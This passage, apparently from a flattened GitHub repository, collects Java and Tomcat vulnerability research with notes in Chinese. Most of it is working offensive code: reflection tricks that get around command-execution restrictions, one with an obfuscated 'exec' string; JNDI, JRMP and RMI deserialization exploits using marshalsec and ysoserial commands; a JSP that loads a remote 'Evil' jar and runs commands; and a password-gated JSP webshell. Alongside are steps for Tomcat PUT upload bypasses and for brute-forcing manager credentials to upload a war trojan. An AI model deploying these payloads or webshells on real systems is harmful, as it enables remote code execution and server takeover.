C.getDeclaredConstructor(ActivationSystemException.class, int.class, ServerDef.class, int.class ,String.class , boolean.class, boolean.class ); 14 | declaredConstructor.setAccessible(true); 15 | Class l = Class.forName("java.util.logging.Logger"); 16 | Constructor declaredConstructor1 = l.getDeclaredConstructor(String.class); 17 | declaredConstructor1.setAccessible(true); 18 | Logger o1 = (Logger)declaredConstructor1.newInstance("Firebasky"); 19 | ActivationSystemException activationSystemException = new ActivationSystemException(o1); 20 | ServerDef serverDef = new ServerDef(null,null,"C:\\",null,null); 21 | Object o = declaredConstructor.newInstance(activationSystemException, 0, serverDef, 0, "", false, false); 22 | Field activationCmd = C.getDeclaredField("activationCmd"); 23 | activationCmd.setAccessible(true); 24 | activationCmd.set(o,"calc"); 25 | Method verify = C.getMethod("verify"); 26 | verify.invoke(o); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /shell/bypass/test.java: -------------------------------------------------------------------------------- 1 | package shell.bypass; 2 | 3 | import java.io.BufferedReader; 4 | import java.io.InputStreamReader; 5 | import java.lang.reflect.Method; 6 | import java.util.Map; 7 | 8 | public class test { 9 | public static void main(String[] args) { 10 | try { 11 | bypass(new String[]{"ipconfig"}); 12 | } catch (Exception e) { 13 | e.printStackTrace(); 14 | } 15 | } 16 | public static void bypass(String[] cmd) throws Exception{ 17 | Map envblock=null; 18 | String path=null; 19 | ProcessBuilder.Redirect[] stdHandles=null; 20 | boolean redirectErrorStream=true; 21 | 22 | Class C = Class.forName("java.lang.ProcessImpl"); 23 | Method start = C.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class); 24 | start.setAccessible(true); 25 | Process e = (Process) start.invoke(null, cmd, envblock, path, stdHandles, 
redirectErrorStream); 26 | 27 | BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(e.getInputStream())); 28 | String line; 29 | while ((line=bufferedReader.readLine())!=null){ 30 | System.out.println(line); 31 | } 32 | bufferedReader.close(); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /shell/bypass/test2.java: -------------------------------------------------------------------------------- 1 | package shell.bypass; 2 | 3 | import java.beans.Statement; 4 | 5 | public class test2 { 6 | public static void main(String[] args) { 7 | String payload ="calc"; 8 | Statement statement = new Statement(Runtime.getRuntime(), "\u0065" + "\u0078" + "\u0065" + "\u0063", new Object[]{payload}); 9 | try { 10 | statement.execute(); 11 | } catch (Exception e) { 12 | e.printStackTrace(); 13 | } 14 | } 15 | } 16 | 17 | -------------------------------------------------------------------------------- /shell/bypass/test4.java: -------------------------------------------------------------------------------- 1 | package shell.bypass; 2 | 3 | 4 | import sun.net.www.MimeEntry; 5 | 6 | import java.io.InputStream; 7 | import java.lang.reflect.Constructor; 8 | import java.lang.reflect.Field; 9 | import java.net.URL; 10 | import java.net.URLConnection; 11 | 12 | public class test4 { 13 | public static void main(String[] args)throws Exception { 14 | bypass("notepad"); 15 | } 16 | public static void bypass(String cmd) throws Exception{ 17 | Class aClass = Class.forName("sun.net.www.MimeEntry"); 18 | Constructor d = aClass.getDeclaredConstructor(String.class,int.class,String.class,String.class); 19 | d.setAccessible(true); 20 | MimeEntry obj =(MimeEntry) d.newInstance("Firebasky", 1314, "C:\\windows\\win.ini", "%s"); 21 | 22 | URL url = new URL("http://127.0.0.1:8000"); 23 | URLConnection urlConnection = url.openConnection(); 24 | InputStream inputStream = urlConnection.getInputStream(); 25 | 26 | Class C = 
Class.forName("sun.net.www.MimeLauncher"); 27 | Constructor declaredConstructor = C.getDeclaredConstructor(MimeEntry.class, URLConnection.class, InputStream.class, String.class, String.class); 28 | declaredConstructor.setAccessible(true);; 29 | Thread o = (Thread)declaredConstructor.newInstance(obj,urlConnection, inputStream, "", ""); 30 | Field execPath = C.getDeclaredField("execPath"); 31 | execPath.setAccessible(true); 32 | execPath.set(o,cmd); 33 | o.run(); 34 | 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /shell/jndi/client.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,java.rmi.*,java.rmi.server.*,java.rmi.registry.*,javax.naming.*"%> 2 | <% 3 | System.setProperty(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.rmi.registry.RegistryContextFactory"); 4 | System.setProperty(Context.PROVIDER_URL,"rmi://127.0.0.1:1099"); 5 | Context ctx = new InitialContext(); 6 | Object obj = ctx.lookup("Exploit"); 7 | System.out.println(obj.toString()); 8 | %> 9 | -------------------------------------------------------------------------------- /shell/jndi/yso.txt: -------------------------------------------------------------------------------- 1 | java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip/#Exploit 2 | -------------------------------------------------------------------------------- /shell/jrmp/client.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,java.rmi.*,java.rmi.server.*,java.rmi.registry.*"%> 2 | <% 3 | String host = "127.0.0.1"; 4 | int port = 8855; 5 | 6 | ObjID id = new ObjID((new Random()).nextInt()); 7 | sun.rmi.transport.tcp.TCPEndpoint te = new sun.rmi.transport.tcp.TCPEndpoint(host, port); 8 | 
sun.rmi.server.UnicastRef ref = new sun.rmi.server.UnicastRef(new sun.rmi.transport.LiveRef(id, te, false)); 9 | RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref); 10 | 11 | ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); 12 | ObjectOutputStream outStream = new ObjectOutputStream(new BufferedOutputStream(byteArrayOutputStream)); 13 | outStream.writeObject(obj); 14 | outStream.flush(); 15 | outStream.close(); 16 | 17 | ObjectInputStream in = new ObjectInputStream(new BufferedInputStream(new ByteArrayInputStream(byteArrayOutputStream.toByteArray()))); 18 | in.readObject(); 19 | %> 20 | -------------------------------------------------------------------------------- /shell/jrmp/exp.txt: -------------------------------------------------------------------------------- 1 | java8 -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip/#Exploit 2 | 3 | public class Exploit { 4 | public Exploit(){ 5 | try{ 6 | Runtime.getRuntime().exec("calc"); 7 | }catch(Exception e){ 8 | e.printStackTrace(); 9 | } 10 | } 11 | public static void main(String[] argv){ 12 | Exploit e = new Exploit(); 13 | } 14 | } 15 | -------------------------------------------------------------------------------- /shell/loadjar/Evil.java: -------------------------------------------------------------------------------- 1 | package com.company; 2 | import java.io.IOException; 3 | 4 | public class Evil { 5 | public void exec(String cmd) throws IOException { 6 | Runtime.getRuntime().exec(cmd); 7 | } 8 | } 9 | -------------------------------------------------------------------------------- /shell/loadjar/server.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*"%> 2 | <% 3 | out.println(222222222); 4 | URL url = new URL("http://ip/Temp.jar"); 5 | URLClassLoader loader = new URLClassLoader (new URL[] {url}); 
6 | Class cl = Class.forName ("com.company.Evil", true, loader); 7 | Object evil = cl.newInstance(); 8 | cl.getMethod("exec",String.class).invoke(evil,"calc"); 9 | %> 10 | -------------------------------------------------------------------------------- /shell/rmi-registry-bind/server.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,java.beans.*,java.lang.*,java.rmi.*,java.rmi.server.*,java.rmi.registry.*"%> 2 | <% 3 | class ServerImp extends UnicastRemoteObject { 4 | protected ServerImp() throws RemoteException { 5 | } 6 | 7 | } 8 | ServerImp server = new ServerImp(); 9 | int port = 1099; 10 | String registry_name = "rmi"; 11 | Registry registry = LocateRegistry.createRegistry(port); 12 | registry.bind(registry_name, server); 13 | System.out.println("Port:1099,Name:rmi,Service Start!n"); 14 | %> 15 | -------------------------------------------------------------------------------- /shell/rmi-registry-bind/yso.txt: -------------------------------------------------------------------------------- 1 | java -cp ysoserial-all.jar ysoserial.exploit.RMIRegistryExploit 127.0.0.1 1099 Jdk7u21 "calc" 2 | -------------------------------------------------------------------------------- /spring-bug/CVE-2016-4977.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/spring-bug/CVE-2016-4977.pdf -------------------------------------------------------------------------------- /spring-bug/CVE-2017-4971分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/spring-bug/CVE-2017-4971分析.pdf -------------------------------------------------------------------------------- /spring-bug/CVE-2017-8046分析.pdf: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/spring-bug/CVE-2017-8046分析.pdf -------------------------------------------------------------------------------- /spring-bug/CVE-2018-1270.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/spring-bug/CVE-2018-1270.pdf -------------------------------------------------------------------------------- /spring-bug/README.md: -------------------------------------------------------------------------------- 1 | # 分析介绍spring框架漏洞 2 | -------------------------------------------------------------------------------- /tomcat/CVE-2017-12615Tomcat远程代码执行漏洞/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-12615Tomcat远程代码执行漏洞 2 | 3 | **漏洞介绍** 4 | 5 | 远程代码执行漏洞(CVE-2017-12615) 影响:Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法,攻击者通过构造的攻击请求向服务器上传包含任意代码的 JSP 文件,造成任意代码执行,危害十分严重 6 | 7 | **影响版本** 8 | 9 | `Apache Tomcat 7.0.0 - 7.0.81` 10 | 11 | **漏洞利用前提:** 12 | 13 | 需Tomcat开启了HTTP PUT请求 14 | 15 | 打开Tomcat安装目录的Tomcat7.0.x\conf\web.xml添加配置, 16 | 在Tomcat7.0版本下默认配置是开启readonly的,需要手动配置readonly为false才可以进行漏洞利用。 17 | ``` 18 | 19 | readonly 20 | false 21 | 22 | ``` 23 | 24 | **漏洞原理分析** 25 | 26 | Tomcat 的 Servlet 是在 conf/web.xml 配置的,通过配置文件可知,当后缀名为 .jsp 和 .jspx 的时候,是通过 JspServlet 处理请求的:而其他的静态文件是通过 DefaultServlet 处理的:可以得知,“1.jsp ”(末尾有一个空格)并不能匹配到JspServlet,而是会交由 DefaultServlet 去处理。 27 | 当处理 PUT 请求时:会调用 resources.bind:dirContext 为 FileDirContext:调用 rebind 创建文件:又由于 Windows 不允许“ ”作为文件名结尾,所以会创建一个 .jsp 文件,导致代码执行。 28 | 29 | **该漏洞实际上是利用了 Windows 下文件名解析的漏洞来触发的**。通过构造特殊后缀名,绕过Tomcat检测,让Tomcat用DefaultServlet的逻辑处理请求,从而上传jsp webshell文件 30 | 有三种方法可以进行绕过 31 | 32 | ``` 33 | shell.jsp%20 34 | shell.jsp::$DATA 35 | shell.jsp/ 36 | ``` 37 | 
-------------------------------------------------------------------------------- /tomcat/CVE-2020-13942 Apache Unomi 远程代码执行漏洞/README.md: -------------------------------------------------------------------------------- 1 | ## CVE-2020-13942 Apache Unomi 远程代码执行漏洞 2 | 3 | **Apache Unomi简介** 4 | 5 | Apache Unomi 是一个基于标准的客户/数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。 6 | 7 | Apache Unomi 具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B 测试等功能,它可以作为: 8 | 9 | + Web CMS 个性化服务 10 | 11 | + 原生移动应用的分析服务 12 | 13 | + 具有分段功能的集中配置文件管理系统 14 | 15 | + 授权管理中心 16 | 17 | **漏洞描述** 18 | 19 | Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月 Unomi 成为Apache 软件基金会项目。在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或OGNL表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为`CVE-2020-11975`,而`CVE-2020-13942`漏洞是对`CVE-2020-11975`漏洞的补丁绕过,攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码 20 | 21 | **漏洞影响版本** 22 | 23 | Apache Unomi < 1.5.2 24 | 25 | -------------------------------------------------------------------------------- /tomcat/CVE-2020-1938文件包含漏洞/README.md: -------------------------------------------------------------------------------- 1 | ## CVE-2020-1938文件包含漏洞 2 | 3 | **漏洞描述** 4 | 5 | 该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件,如:webapp配置文件或源代码等。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。 6 | 7 | **漏洞影响版本** 8 | 9 | ``` 10 | Apache Tomcat 6 11 | Apache Tomcat 7 < 7.0.100 12 | Apache Tomcat 8 < 8.5.51 13 | Apache Tomcat 9 < 9.0.31 14 | ``` 15 | 16 | **不受影响版本** 17 | 18 | ``` 19 | Apache Tomcat = 7.0.100 20 | Apache Tomcat = 8.5.51 21 | Apache Tomcat = 9.0.31 22 | ``` 23 | 24 | **漏洞分析** 25 | 26 | Tomcat在处理ajp协议时存在漏洞,可通过调用request.setAttribute为Tomcat设置任意request属性。复现发现Tomcat ajp协议存在web目录下任意文件读取漏洞以及JSP文件包含漏洞。 27 | 当ajp URI设置为非jsp路径时,Tomcat会调用DefaultServlet处理,此时会导致web目录任意文件读取漏洞。 28 | 29 | 当ajp URI设置为jsp路径时,Tomcat会调用JspServlet处理,此时会导致JSP文件包含漏洞 30 | 31 | 使用poc扫描目标网站 32 | 33 | ``` 
34 | 下载地址: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 35 | ``` 36 | 37 | **防御方式** 38 | 39 | 1.禁用AJP协议,在tomcat安装路径中找到/conf/server.xml文件,删除或注释下面这行代码:`` 40 | 2.升级到tomcat最新版本 41 | 3.配置secret来设置AJP协议的认证凭证,如: 42 | 43 | ```xml 44 | 45 | ``` 46 | 47 | ## 48 | -------------------------------------------------------------------------------- /tomcat/README.md: -------------------------------------------------------------------------------- 1 | # 关于tomcat的历史漏洞分析 2 | 3 | Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的 4 | 5 | ![](./img/1.png) 6 | -------------------------------------------------------------------------------- /tomcat/Tomcat后台弱口令漏洞/README.md: -------------------------------------------------------------------------------- 1 | # Tomcat后台弱口令漏洞 2 | 3 | Tomcat后台存在弱口令,进入网站后点击登录然后使用burp进行爆破测试 4 | 5 | 可以发现账户密码是利用Authorization该授权字段以base64方式传递账户信息的 6 | 发现加密方式后,拿去解密后发现他的数据传输是将账户与密码用冒号进行组合之后在用base64加密所传递的。构造字段进行爆破 7 | 使用burp抓包后发送到 Intrude 模块进行暴力破解 8 | 9 | 成功爆破出账号密码,然后使用base64解码得出明文账号密码 10 | 使用爆破出的账号密码登录进去后台后发现有一个上传页面,直接上传一个war木马就可以 11 | 12 | 可以使用python进行暴力破解或者是bp 13 | 这里可以使用kali的msf模块 14 | 15 | ``` 16 | use auxiliary/scanner/http/tomcat_mgr_login 17 | set rhosts ip 18 | set rport port 19 | ``` 20 | -------------------------------------------------------------------------------- /tomcat/Tomcat后台弱口令漏洞/shell.jsp: -------------------------------------------------------------------------------- 1 | <% 2 | // shell.jsp?pwn=Firebasky&cmd=whoami 3 | if("Firebasky".equals(request.getParameter("pwd"))){ 4 | java.io.InputStream in = 
Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); 5 | int a = -1; 6 | byte[] b = new byte[2048]; 7 | out.print("
");
 8 |     while((a=in.read(b))!=-1){
 9 |         out.println(new String(b));
10 |     }
11 |     out.print("
"); 12 | } 13 | //jar cvf shell.war .\shell.jsp 14 | %> 15 | -------------------------------------------------------------------------------- /tomcat/Tomcat后台弱口令漏洞/shell.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/tomcat/Tomcat后台弱口令漏洞/shell.war -------------------------------------------------------------------------------- /tomcat/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kezibei/Java/1a85659e2eeb8bfa2ef75f6c27521fce940be32c/tomcat/img/1.png -------------------------------------------------------------------------------- /tomcat/img/README.md: -------------------------------------------------------------------------------- 1 | ## 照片 2 | --------------------------------------------------------------------------------